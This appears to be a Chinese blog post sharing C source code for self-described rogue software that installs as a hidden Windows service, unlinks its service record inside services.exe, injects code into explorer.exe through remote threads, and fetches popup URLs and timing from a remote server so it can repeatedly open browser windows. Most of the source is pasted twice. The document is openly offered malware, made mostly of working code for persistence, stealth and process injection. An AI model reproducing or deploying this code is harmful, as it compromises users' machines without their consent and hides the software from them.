2022-04-07 09:54:30
这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成... 08-12-27...
* 1. 给xx作的流氓软件
* 2. 隐藏服务是copy的eva的代码,修改services.exe进程内存。
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <tlhelp32.h>
// 是否记录日志
//#define debug
#ifdef debug
#define debug_log "c:\debug.txt"
// 日志记录函数
void logtofile( wchar * );
#include "controlservice.h"
#include "hideservice.h"
#include "customfunction.h"
#pragma comment (lib, "advapi32.lib")
#pragma comment (lib, "shell32.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "user32.lib")
#define remote_func_length 1024 * 10 // 拷贝的长度
#define target_process l"explorer.exe" // 要注入代码的目标进程
#define config_host "www.icylife.net" // 读取配置信息的服务器
#define config_path "/url.txt" // 配置信息在配置服务器的路径
#define ie_path "c:\program files\internet explorer\iexplore.exe"
#define default_url "http://www.he100.com" // 默认弹出的窗口
#define default_sleep_time 30 * 60 * 1000 // 默认弹出窗口的间隔时间
// 宏,转换字符串为unicode
#define multi_to_wide( x, y ) multibytetowidechar( cp_acp, mb_precomposed,y,-1,x,_max_path );
// 弹出窗口之间的间隔时间
int sleep_time;
// 弹出的url地址
char url_path[512] = { 0 };
* 函数原形
void servicemain( dword, char **); //服务入口
bool setdebugprivilege( ); //获取debug权限
dword getprocessidbyname(wchar * ); //获取进程的pid
void injectcode( ); //写代码到远程进程
void getconfig( ); //更新配置,获取要弹出的地址和弹出间隔时间
* 程序入口,主函数
int winmain( hinstance hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow )
wchar filepath[max_path] = { 0 }; //程序本身路径
service_table_entry servicetable[2];
servicetable[0].lpservicename = service_name;
servicetable[0].lpserviceproc = ( lpservice_main_function )servicemain;
servicetable[1].lpservicename = null;
servicetable[1].lpserviceproc = null;
getmodulefilename( null, filepath, max_path );
// 如果服务未安装,安装
if( !serviceexists( filepath ) )
if( serviceinstall( filepath ) != true )
return -1;
return 0;
if( !startservicectrldispatcher( servicetable ) )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"main startservicectrldispatcher error: %d\n", getlasterror() );
logtofile( tmp );
return -1;
return 0;
* 服务入口
void servicemain( dword argc, char *argv[] )
servicestatus.dwservicetype = service_win32_own_process;
servicestatus.dwcurrentstate = service_start_pending;
servicestatus.dwcontrolsaccepted = service_accept_stop;
servicestatus.dwwin32exitcode = 0;
servicestatus.dwservicespecificexitcode = 0;
servicestatus.dwcheckpoint = 0;
servicestatus.dwwaithint = 0;
#ifdef debug
logtofile( l"servicemain: try to register service\n" );
hservicestatus = registerservicectrlhandler( service_name, (lphandler_function)servicecontrol );
if( hservicestatus == (service_status_handle)0 )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"servicemain: register service error: %d\n", getlasterror() );
logtofile( tmp );
servicestatus.dwcurrentstate = service_running;
servicestatus.dwcheckpoint = 0;
servicestatus.dwwaithint = 0;
if( !setservicestatus( hservicestatus, &servicestatus ) )
#ifdef debug
wchar tmp[256] = { 0 };
swprintf( tmp, l"servicemain: start service error: %d\n", getlasterror() );
logtofile( tmp );
#ifdef debug
logtofile( l"servicemain: start service ok\n" );
// 隐藏服务
hideservice( service_name );
// 从网络读取配置
getconfig( );
// 注入代码
injectcode( );
servicestatus.dwcurrentstate = service_stopped;
if( !setservicestatus( hservicestatus, &servicestatus) )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"servicemain: stop service error: %d\n", getlasterror() );
logtofile( tmp );
#ifdef debug
logtofile( l"stop service in main.\n" );
#ifdef debug
logtofile( l"servicemain done.\n" );
void injectcode( )
if( ! setdebugprivilege() )
#ifdef debug
logtofile( l"set debug privileges error.\n" );
dword dwpid = -1;
while( 1 )
dwpid = getprocessidbyname( target_process );
if( -1 != dwpid )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"target process id is %d\n", dwpid );
logtofile( tmp );
#ifdef debug
logtofile( l"target process not found, sleep and continue.\n" );
sleep( 30 * 1000 );
sleep( 2 * 60 * 1000 );
// 打开进程
handle hprocess = openprocess( process_create_thread | process_vm_operation | process_vm_write, false, dwpid );
if( ! hprocess )
#ifdef debug
logtofile( l"openprocess error.\n" );
arguments arguments;
memset( (void *)&arguments, 0, sizeof(arguments) );
hmodule hkernel = getmodulehandlea( "kernel32" );
if( hkernel == null )
#ifdef debug
logtofile( l"getmodulehandle kernel32.dll error.\n" );
arguments.myloadlibrary = getprocaddress( hkernel, "loadlibrarya" );
arguments.mygetaddress = getprocaddress( hkernel, "getprocaddress" );
strcpy( arguments.mykerneldll, "kernel32.dll" );
strcpy( arguments.myprogram, ie_path );
strcpy( arguments.myshelldll, "shell32.dll" );
strcpy( arguments.myshellexecute, "shellexecutea" );
strcpy( arguments.myurl, url_path );
strcpy( arguments.myzeromemory, "rtlzeromemory" );
arguments.sleeptime = sleep_time;
// 在远程进程中分配内存存放参数,可写权限
arguments *remote_agrument = (arguments *)virtualallocex( hprocess,
page_readwrite );
if( !remote_agrument )
#ifdef debug
logtofile( l"virtualallocex for arguments error.\n" );
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"remote arguments' addr: 0x%08x\n", (dword)remote_agrument );
logtofile( tmp );
// 将参数写入远程进程内存
int bytes_write;
if( !writeprocessmemory( hprocess, (lpvoid)remote_agrument, (lpvoid)&arguments, sizeof(arguments), (size_t *)&bytes_write) )
#ifdef debug
logtofile( l"writeprocessmemory for arguments error.\n" );
// 在远程进程中分配内存存放代码,可执行权限
lpvoid remote_func = virtualallocex( hprocess,
page_execute_readwrite );
if( !remote_func )
#ifdef debug
logtofile( l"virtualallocex for function error.\n" );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"remote function address: 0x%08x\n", remote_func );
logtofile( tmp );
// 将代码写入远程进程内存
if( !writeprocessmemory( hprocess, (lpvoid)remote_func, (lpvoid)&customfunction, remote_func_length, (size_t *)&bytes_write) )
#ifdef debug
logtofile( l"writeprocessmemory for function error.\n" );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"writeprocessmemory for function %d bytes\n", bytes_write );
logtofile( tmp );
handle remote_thread = createremotethread( hprocess, 0, 0, (lpthread_start_routine)remote_func, remote_agrument, 0, 0 );
if ( !remote_thread )
#ifdef debug
logtofile( l"createremotethread for function error.\n" );
#ifdef debug
logtofile( l"createremotethread for function ok\n" );
waitforsingleobject( remote_thread, infinite );
if( null != remote_func )
virtualfreeex( hprocess, remote_func, remote_func_length, mem_release );
#ifdef debug
logtofile( l"virtualfreeex for remote_func.\n" );
if( null != remote_agrument )
virtualfreeex( hprocess, remote_agrument, sizeof (arguments), mem_release);
#ifdef debug
logtofile( l"virtualfreeex for remote_agrument.\n" );
if( null != remote_thread )
closehandle( remote_thread );
#ifdef debug
logtofile( l"closehandle for remote_thread.\n" );
if( null != hprocess )
closehandle( hprocess );
#ifdef debug
logtofile( l"closehandle for hprocess.\n" );
void getconfig( )
#ifdef debug
wchar tmp[256] = { 0 };
wsadata wsa;
struct sockaddr_in sin;
memset( &sin, 0, sizeof(struct sockaddr_in) );
if( wsastartup( 0x0202, &wsa ) != 0 )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"wsastartup error: %d\n", getlasterror() );
logtofile( tmp );
goto getconfig_error;
struct hostent *phost = gethostbyname( config_host );
if( phost == null )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"resolv config host name error: %d\n", getlasterror() );
logtofile( tmp );
wsacleanup( );
goto getconfig_error;
memcpy( &sin.sin_addr , phost->h_addr_list[0] , phost->h_length );
sin.sin_family = af_inet;
sin.sin_port = htons( 80 );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wchar ip[256] = { 0 };
multi_to_wide( ip, inet_ntoa( sin.sin_addr ));
wsprintf( tmp, l"resolv config host name ok: %s\n",ip );
logtofile( tmp );
socket sock = socket( af_inet , sock_stream , 0 );
if( sock == invalid_socket )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"connect to %s:%s error: \n", ip, 80, getlasterror() );
logtofile( tmp );
wsacleanup( );
goto getconfig_error;
int ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( socket_error == ret )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"connect error: %d\n", getlasterror() );
logtofile( tmp );
closesocket( sock );
wsacleanup( );
goto getconfig_error;
char send_buff[512] = { 0 };
sprintf( send_buff, "get %s http/1.1\r\nhost: %s\r\naccept: */*\r\n\r\n", config_path, config_host );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wchar tmp2[256] = { 0 };
multi_to_wide( tmp2, send_buff );
wsprintf( tmp, l"send request to get config:\n %s\n", tmp2 );
logtofile( tmp );
ret = send( sock, send_buff, strlen(send_buff), 0 );
if( socket_error == ret )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"send request error: %d\n", getlasterror() );
logtofile( tmp );
closesocket( sock );
wsacleanup( );
goto getconfig_error;
#ifdef debug
logtofile( l"send request ok!\n" );
char recv_buff[1024] = { 0 };
recv( sock, recv_buff, 1000, 0 );
if( !recv_buff )
closesocket( sock );
wsacleanup( );
goto getconfig_error;
closesocket( sock );
wsacleanup( );
char *content = strstr( recv_buff, "\r\n\r\n" );
if( !content )
goto getconfig_error;
content += strlen("\r\n\r\n");
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wchar c[256] = { 0 };
multi_to_wide( c, content );
wsprintf( tmp, l"config content is:\n%s\n", c );
logtofile( tmp );
char *split_flag = strstr( content, "|" );
if( !split_flag )
goto getconfig_error;
char tmp_time[32] = { 0 };
char tmp_url[512] = { 0 };
if( split_flag - content > 32 )
sleep_time = default_sleep_time;
strncpy( tmp_time, content, split_flag - content );
sleep_time = atoi( tmp_time );
if( strlen( split_flag ) >= 512 )
strcpy( url_path, default_url );
strcpy( url_path, split_flag + 1 );
sleep_time = default_sleep_time;
strcpy( url_path, default_url );
* 记录日志函数
#ifdef debug
void logtofile( wchar *str )
file *fp;
fp = fopen( debug_log, "a" );
fwprintf( fp, l"%s\n", str );
fclose( fp );
// yunshu(pst) copy from zzzevazzz(pst)'s code
// 几个undocument的结构
typedef struct _sc_service_process sc_service_process, *psc_service_process;
typedef struct _sc_depend_service sc_depend_service, *psc_depend_service;
typedef struct _sc_service_record sc_service_record, *psc_service_record;
typedef struct _sc_service_process
psc_service_process previous;
psc_service_process next;
wchar *imagepath;
dword pid;
dword numberofservices;
// ...
} sc_service_process, *psc_service_process;
typedef struct _sc_depend_service
psc_depend_service next;
dword unknow;
psc_service_record service;
// ...
} sc_depend_service, *psc_depend_service;
typedef struct _sc_service_record
psc_service_record previous;
psc_service_record next;
wchar *servicename;
wchar *displayname;
dword index;
dword unknow0;
dword serv;
dword controlcount;
dword unknow1;
psc_service_process process;
service_status status;
dword starttype;
dword errorcontrol;
dword tagid;
psc_depend_service dependon;
psc_depend_service depended;
// ...
} sc_service_record, *psc_service_record;
bool setdebugprivilege()
bool bret = false;
handle htoken = null;
luid luid;
token_privileges tp;
if (openprocesstoken(getcurrentprocess(), token_all_access, &htoken) &&
lookupprivilegevalue(null, se_debug_name, &luid))
tp.privilegecount = 1;
tp.privileges[0].luid = luid;
tp.privileges[0].attributes = se_privilege_enabled;
bret = adjusttokenprivileges(htoken, false, &tp, sizeof(token_privileges), null, null);
if (htoken) closehandle(htoken);
return bret;
dword getprocessidbyname(wchar *name)
bool bret = false;
handle hprocesssnap = null;
processentry32 pe32 = { 0 };
dword pid = -1;
hprocesssnap = createtoolhelp32snapshot(th32cs_snapprocess, 0);
if (invalid_handle_value == hprocesssnap) return -1;
pe32.dwsize = sizeof(processentry32);
if (process32first(hprocesssnap, &pe32))
if ( !_wcsicmp(pe32.szexefile, name ) )
pid = pe32.th32processid;
while (process32next(hprocesssnap, &pe32));
return pid;
// 修改内存属性为指定值
void protectwritedword(handle hprocess, dword *addr, dword value)
memory_basic_information mbi;
dword dwoldprotect, dwwritten;
virtualqueryex(hprocess, addr, &mbi, sizeof(mbi));
virtualprotectex(hprocess, mbi.baseaddress, mbi.regionsize, page_readwrite, &mbi.protect);
writeprocessmemory(hprocess, addr, &value, sizeof(dword), &dwwritten);
virtualprotectex(hprocess, mbi.baseaddress, mbi.regionsize, mbi.protect, &dwoldprotect);
psc_service_record findfirstservicerecord(handle hprocess)
wchar filename[max_path+1];
handle hfile, hfilemap;
uchar * pmap;
dword dwsize, dwsizehigh, i, dwread;
sc_service_record svcrd, *psvcrd, *pret = null;
getsystemdirectory( filename, max_path );
wcscat( filename, l"\services.exe");
hfile = createfile(filename, generic_read, file_share_read,
null, open_existing, 0, null);
if (invalid_handle_value == hfile) return null;
dwsizehigh = 0;
dwsize = getfilesize(hfile, &dwsizehigh);
hfilemap = createfilemapping(hfile, null, page_readonly, 0, 0, null);
if (null == hfilemap) return null;
pmap = (uchar*)mapviewoffile(hfilemap, file_map_read, 0, 0, 0);
if (null == pmap) return null;
dwsize -= 12;
for (i=0; i<dwsize; ++i)
// 搜索services!scgetservicedatabase特征代码
if (*(dword*)(pmap+i) == 0xa1909090 &&
*(dword*)(pmap+i+8) == 0x909090c3)
#ifdef debug
wchar tmpbuffer[256] = { 0 };
wsprintf( tmpbuffer, l"map is 0x%08x\n", (dword *)(pmap+i) );
logtofile( tmpbuffer );
if (readprocessmemory(hprocess, *(pvoid*)(pmap+i+4), &psvcrd, sizeof(pvoid), &dwread) &&
readprocessmemory(hprocess, psvcrd, &svcrd, sizeof(svcrd), &dwread) &&
svcrd.serv == 'vres') // servicerecord结构的特征
pret = psvcrd;
#ifdef debug
wchar tmpbuffer[256] = { 0 };
wsprintf( tmpbuffer, l"pret is 0x%08x\n", (dword *)(psvcrd) );
logtofile( tmpbuffer );
//printf( "addr: 0x%08x\n", (dword *)pret );
return pret;
// 隐藏服务
bool hideservice( wchar *name )
dword pid;
handle hprocess;
sc_service_record svcrd, *psvcrd;
dword dwread, dwnamesize;
wchar svcname[max_path] = { 0 };
dwnamesize = ( wcslen(name) + 1 ) * sizeof(wchar);
if (dwnamesize > sizeof(svcname)) return false;
pid = getprocessidbyname( text("services.exe") );
#ifdef debug
wchar tmpbuffer1[256] = { 0 };
wsprintf( tmpbuffer1, l"pid is %d\n", pid );
logtofile( tmpbuffer1 );
if (pid == -1) return false;
if( ! setdebugprivilege() ) return false;
hprocess = openprocess(process_all_access, false, pid);
if (null == hprocess) return false;
psvcrd = findfirstservicerecord(hprocess);
if (null == psvcrd)
#ifdef debug
logtofile( l"can't find servicedatabase.\n" );
return false;
if (readprocessmemory(hprocess, psvcrd, &svcrd, sizeof(svcrd), &dwread) &&
readprocessmemory(hprocess, svcrd.servicename, svcname, dwnamesize, &dwread))
// 匹配服务名
if ( 0 == _wcsicmp(svcname, name) )
// 从链表中断开(一般来说servicerecord是可写的,但还是先改保护属性以防万一)
protectwritedword(hprocess, (dword *)svcrd.previous+1, (dword)svcrd.next);
protectwritedword(hprocess, (dword *)svcrd.next, (dword)svcrd.previous);
#ifdef debug
wchar tmpbuffer2[256] = { 0 };
wsprintf( tmpbuffer2, l"the service \"%s\" is hidden successfully.\n", name );
logtofile( tmpbuffer1 );
return true;
while (psvcrd = svcrd.next);
if( null != hprocess )
return false;
typedef struct _arguments
char myurl[512];
char myprogram[512];
farproc myloadlibrary;
farproc mygetaddress;
char mykerneldll[32];
char myshelldll[32];
char myzeromemory[32];
char myshellexecute[32];
dword sleeptime;
* winapi函数原形
typedef hmodule (__stdcall *loadlibrarya)( in char* lpfilename );
typedef farproc (__stdcall *getprocaddress)( in hmodule hmodule, in char* lpprocname );
typedef void (__stdcall *zeromemory)( in pvoid destination, in size_t length );
void __stdcall customfunction( lpvoid my_arguments )
arguments *func_args = (arguments *)my_arguments;
loadlibrarya loadlibrarya = (loadlibrarya)func_args->myloadlibrary;
getprocaddress getprocaddress = (getprocaddress)func_args->mygetaddress;
hmodule h_kernel = loadlibrarya( func_args->mykerneldll );
hmodule h_shell = loadlibrarya( func_args->myshelldll );
zeromemory zeromemory = (zeromemory)getprocaddress( h_kernel, func_args->myzeromemory );
dword myshellexecutea = (dword)getprocaddress( h_shell, func_args->myshellexecute );
dword mysleep;
dword sleep_time = func_args->sleeptime;
push eax
push esp
sub esp, 6
mov byte ptr [esp], 's'
mov byte ptr [esp+1], 'l'
mov byte ptr [esp+2], 'e'
mov byte ptr [esp+3], 'e'
mov byte ptr [esp+4], 'p'
mov byte ptr [esp+5], ''
lea eax, [esp]
push eax
push h_kernel
call getprocaddress
mov mysleep, eax
add esp, 6
pop esp
pop eax
while( 1 )
push eax
push esp
push ecx
push ebx
sub esp, 256
mov byte ptr [esp], 'o'
mov byte ptr [esp+1], 'p'
mov byte ptr [esp+2], 'e'
mov byte ptr [esp+3], 'n'
mov byte ptr [esp+4], ''
lea ebx, [esp]
push sw_showmaximized
push 0
push func_args
mov ecx, func_args
add ecx, 200h
lea eax, [ecx]
push eax
push ebx
push 0
call myshellexecutea
add esp, 256
pop ebx
pop ecx
pop esp
pop eax
push sleep_time
call mysleep
* 全局变量
#define service_name l"lemontree"
#define service_description l"lemontree"
#define service_display_name l"lemontree"
service_status servicestatus;
service_status_handle hservicestatus;
bool serviceinstall( wchar * ); //安装服务
bool serviceunstall( wchar * ); //删除服务
void servicecontrol( dword ); //控制服务
bool serviceexists( wchar * ); //判断服务是否存在
* 安装服务
* 参数:主程序全路径
* 返回:成功返回true,否则为false
bool serviceinstall( wchar *exefilepath )
wchar tmppath[max_path] = { 0 };
hkey key;
sc_handle servicemangerhandle = openscmanager( null, null, sc_manager_create_service );
if ( servicemangerhandle == 0 )
printf( "install: open services manager database error: %d\n", getlasterror() );
return false;
sc_handle servicehandle = createservice
servicemangerhandle ,
service_name ,
service_display_name ,
service_all_access ,
service_win32_own_process ,
service_auto_start ,
service_error_normal ,
exefilepath ,
null ,
null ,
null ,
null ,
if ( servicehandle == 0 )
printf( "create service error: %d\n", getlasterror() );
closeservicehandle( servicemangerhandle );
return false;
wcscpy( tmppath, l"system\currentcontrolset\services\" );
wcscat( tmppath, service_name );
if( regopenkey( hkey_local_machine, tmppath, &key ) != error_success )
printf( "open key %s error: %d\n", tmppath, getlasterror() );
return false;
regsetvalueex( key, l"description", 0, reg_sz, (byte *)service_description, wcslen(service_description) );
if( !startservice( servicehandle, 0, 0 ) )
printf( "install service ok, but start it error: %d\n", getlasterror() );
printf( "install service ok, start it ok.\n" );
closeservicehandle( servicehandle );
closeservicehandle( servicemangerhandle );
return true;
* 删除服务
bool serviceunstall( wchar *servicename )
sc_handle scmhandle = openscmanager (null, null, sc_manager_all_access);
if ( scmhandle == null )
return false;
sc_handle schandle = openservice( scmhandle, servicename, service_all_access );
if( schandle == null )
closeservicehandle( scmhandle );
return false;
deleteservice( schandle );
closeservicehandle( schandle );
closeservicehandle( scmhandle );
return true;
* 服务控制函数
void servicecontrol( dword request )
#ifdef debug
logtofile( l"servicecontrol: into servicecontrol\n" );
switch ( request )
case service_control_pause:
servicestatus.dwcurrentstate = service_paused;
case service_control_continue:
servicestatus.dwcurrentstate = service_running;
case service_control_stop:
#ifdef debug
logtofile( l"servicecontrol: try to stop service\n" );
servicestatus.dwwin32exitcode = 0;
servicestatus.dwcurrentstate = service_stop_pending;
servicestatus.dwcheckpoint = 0;
servicestatus.dwwaithint = 0;
case service_control_interrogate:
#ifdef debug
logtofile( l"servicecontrol: error arguments\n" );
if( !setservicestatus( hservicestatus, &servicestatus ) )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"servicemain: control service error: %d\n", getlasterror() );
logtofile( tmp );
bool serviceexists( wchar *path )
wchar tmppath[max_path] = { 0 };
hkey key;
wchar value[512] = { 0 };
int type = reg_expand_sz;
int size = sizeof(value);
wcscpy( tmppath, l"system\currentcontrolset\services\" );
wcscat( tmppath, service_name );
if( regopenkeyex( hkey_local_machine, tmppath, 0, key_query_value, &key ) != error_success )
//printf( "regopenkeyex error: %d\n", getlasterror() );
return false;
if( regqueryvalueex( key, l"imagepath", null, (dword *)&type, (byte *)value, (dword *)&size ) != error_success )
//printf( "regqueryvalueex error: %d\n", getlasterror() );
return false;
if( key ) regclosekey( key );
// 如果服务的程序路径等于后门本身,表示已经安装
if( 0 == _wcsicmp( value, path ) )
return true;
return false;
* 1. 给xx作的流氓软件
* 2. 隐藏服务是copy的eva的代码,修改services.exe进程内存。
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <tlhelp32.h>
// 是否记录日志
//#define debug
#ifdef debug
#define debug_log "c:\debug.txt"
// 日志记录函数
void logtofile( wchar * );
#include "controlservice.h"
#include "hideservice.h"
#include "customfunction.h"
#pragma comment (lib, "advapi32.lib")
#pragma comment (lib, "shell32.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "user32.lib")
#define remote_func_length 1024 * 10 // 拷贝的长度
#define target_process l"explorer.exe" // 要注入代码的目标进程
#define config_host "www.icylife.net" // 读取配置信息的服务器
#define config_path "/url.txt" // 配置信息在配置服务器的路径
#define ie_path "c:\program files\internet explorer\iexplore.exe"
#define default_url "http://www.he100.com" // 默认弹出的窗口
#define default_sleep_time 30 * 60 * 1000 // 默认弹出窗口的间隔时间
// 宏,转换字符串为unicode
#define multi_to_wide( x, y ) multibytetowidechar( cp_acp, mb_precomposed,y,-1,x,_max_path );
// 弹出窗口之间的间隔时间
int sleep_time;
// 弹出的url地址
char url_path[512] = { 0 };
* 函数原形
void servicemain( dword, char **); //服务入口
bool setdebugprivilege( ); //获取debug权限
dword getprocessidbyname(wchar * ); //获取进程的pid
void injectcode( ); //写代码到远程进程
void getconfig( ); //更新配置,获取要弹出的地址和弹出间隔时间
* 程序入口,主函数
int winmain( hinstance hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow )
wchar filepath[max_path] = { 0 }; //程序本身路径
service_table_entry servicetable[2];
servicetable[0].lpservicename = service_name;
servicetable[0].lpserviceproc = ( lpservice_main_function )servicemain;
servicetable[1].lpservicename = null;
servicetable[1].lpserviceproc = null;
getmodulefilename( null, filepath, max_path );
// 如果服务未安装,安装
if( !serviceexists( filepath ) )
if( serviceinstall( filepath ) != true )
return -1;
return 0;
if( !startservicectrldispatcher( servicetable ) )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"main startservicectrldispatcher error: %d\n", getlasterror() );
logtofile( tmp );
return -1;
return 0;
* 服务入口
void servicemain( dword argc, char *argv[] )
servicestatus.dwservicetype = service_win32_own_process;
servicestatus.dwcurrentstate = service_start_pending;
servicestatus.dwcontrolsaccepted = service_accept_stop;
servicestatus.dwwin32exitcode = 0;
servicestatus.dwservicespecificexitcode = 0;
servicestatus.dwcheckpoint = 0;
servicestatus.dwwaithint = 0;
#ifdef debug
logtofile( l"servicemain: try to register service\n" );
hservicestatus = registerservicectrlhandler( service_name, (lphandler_function)servicecontrol );
if( hservicestatus == (service_status_handle)0 )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"servicemain: register service error: %d\n", getlasterror() );
logtofile( tmp );
servicestatus.dwcurrentstate = service_running;
servicestatus.dwcheckpoint = 0;
servicestatus.dwwaithint = 0;
if( !setservicestatus( hservicestatus, &servicestatus ) )
#ifdef debug
wchar tmp[256] = { 0 };
swprintf( tmp, l"servicemain: start service error: %d\n", getlasterror() );
logtofile( tmp );
#ifdef debug
logtofile( l"servicemain: start service ok\n" );
// 隐藏服务
hideservice( service_name );
// 从网络读取配置
getconfig( );
// 注入代码
injectcode( );
servicestatus.dwcurrentstate = service_stopped;
if( !setservicestatus( hservicestatus, &servicestatus) )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"servicemain: stop service error: %d\n", getlasterror() );
logtofile( tmp );
#ifdef debug
logtofile( l"stop service in main.\n" );
#ifdef debug
logtofile( l"servicemain done.\n" );
void injectcode( )
if( ! setdebugprivilege() )
#ifdef debug
logtofile( l"set debug privileges error.\n" );
dword dwpid = -1;
while( 1 )
dwpid = getprocessidbyname( target_process );
if( -1 != dwpid )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"target process id is %d\n", dwpid );
logtofile( tmp );
#ifdef debug
logtofile( l"target process not found, sleep and continue.\n" );
sleep( 30 * 1000 );
sleep( 2 * 60 * 1000 );
// 打开进程
handle hprocess = openprocess( process_create_thread | process_vm_operation | process_vm_write, false, dwpid );
if( ! hprocess )
#ifdef debug
logtofile( l"openprocess error.\n" );
arguments arguments;
memset( (void *)&arguments, 0, sizeof(arguments) );
hmodule hkernel = getmodulehandlea( "kernel32" );
if( hkernel == null )
#ifdef debug
logtofile( l"getmodulehandle kernel32.dll error.\n" );
arguments.myloadlibrary = getprocaddress( hkernel, "loadlibrarya" );
arguments.mygetaddress = getprocaddress( hkernel, "getprocaddress" );
strcpy( arguments.mykerneldll, "kernel32.dll" );
strcpy( arguments.myprogram, ie_path );
strcpy( arguments.myshelldll, "shell32.dll" );
strcpy( arguments.myshellexecute, "shellexecutea" );
strcpy( arguments.myurl, url_path );
strcpy( arguments.myzeromemory, "rtlzeromemory" );
arguments.sleeptime = sleep_time;
// 在远程进程中分配内存存放参数,可写权限
arguments *remote_agrument = (arguments *)virtualallocex( hprocess,
page_readwrite );
if( !remote_agrument )
#ifdef debug
logtofile( l"virtualallocex for arguments error.\n" );
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"remote arguments' addr: 0x%08x\n", (dword)remote_agrument );
logtofile( tmp );
// 将参数写入远程进程内存
int bytes_write;
if( !writeprocessmemory( hprocess, (lpvoid)remote_agrument, (lpvoid)&arguments, sizeof(arguments), (size_t *)&bytes_write) )
#ifdef debug
logtofile( l"writeprocessmemory for arguments error.\n" );
// 在远程进程中分配内存存放代码,可执行权限
lpvoid remote_func = virtualallocex( hprocess,
page_execute_readwrite );
if( !remote_func )
#ifdef debug
logtofile( l"virtualallocex for function error.\n" );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"remote function address: 0x%08x\n", remote_func );
logtofile( tmp );
// 将代码写入远程进程内存
if( !writeprocessmemory( hprocess, (lpvoid)remote_func, (lpvoid)&customfunction, remote_func_length, (size_t *)&bytes_write) )
#ifdef debug
logtofile( l"writeprocessmemory for function error.\n" );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"writeprocessmemory for function %d bytes\n", bytes_write );
logtofile( tmp );
handle remote_thread = createremotethread( hprocess, 0, 0, (lpthread_start_routine)remote_func, remote_agrument, 0, 0 );
if ( !remote_thread )
#ifdef debug
logtofile( l"createremotethread for function error.\n" );
#ifdef debug
logtofile( l"createremotethread for function ok\n" );
waitforsingleobject( remote_thread, infinite );
if( null != remote_func )
virtualfreeex( hprocess, remote_func, remote_func_length, mem_release );
#ifdef debug
logtofile( l"virtualfreeex for remote_func.\n" );
if( null != remote_agrument )
virtualfreeex( hprocess, remote_agrument, sizeof (arguments), mem_release);
#ifdef debug
logtofile( l"virtualfreeex for remote_agrument.\n" );
if( null != remote_thread )
closehandle( remote_thread );
#ifdef debug
logtofile( l"closehandle for remote_thread.\n" );
if( null != hprocess )
closehandle( hprocess );
#ifdef debug
logtofile( l"closehandle for hprocess.\n" );
void getconfig( )
#ifdef debug
wchar tmp[256] = { 0 };
wsadata wsa;
struct sockaddr_in sin;
memset( &sin, 0, sizeof(struct sockaddr_in) );
if( wsastartup( 0x0202, &wsa ) != 0 )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"wsastartup error: %d\n", getlasterror() );
logtofile( tmp );
goto getconfig_error;
struct hostent *phost = gethostbyname( config_host );
if( phost == null )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"resolv config host name error: %d\n", getlasterror() );
logtofile( tmp );
wsacleanup( );
goto getconfig_error;
memcpy( &sin.sin_addr , phost->h_addr_list[0] , phost->h_length );
sin.sin_family = af_inet;
sin.sin_port = htons( 80 );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wchar ip[256] = { 0 };
multi_to_wide( ip, inet_ntoa( sin.sin_addr ));
wsprintf( tmp, l"resolv config host name ok: %s\n",ip );
logtofile( tmp );
socket sock = socket( af_inet , sock_stream , 0 );
if( sock == invalid_socket )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"connect to %s:%s error: \n", ip, 80, getlasterror() );
logtofile( tmp );
wsacleanup( );
goto getconfig_error;
int ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( socket_error == ret )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"connect error: %d\n", getlasterror() );
logtofile( tmp );
closesocket( sock );
wsacleanup( );
goto getconfig_error;
char send_buff[512] = { 0 };
sprintf( send_buff, "get %s http/1.1\r\nhost: %s\r\naccept: */*\r\n\r\n", config_path, config_host );
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wchar tmp2[256] = { 0 };
multi_to_wide( tmp2, send_buff );
wsprintf( tmp, l"send request to get config:\n %s\n", tmp2 );
logtofile( tmp );
ret = send( sock, send_buff, strlen(send_buff), 0 );
if( socket_error == ret )
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, l"send request error: %d\n", getlasterror() );
logtofile( tmp );
closesocket( sock );
wsacleanup( );
goto getconfig_error;
#ifdef debug
logtofile( l"send request ok!\n" );
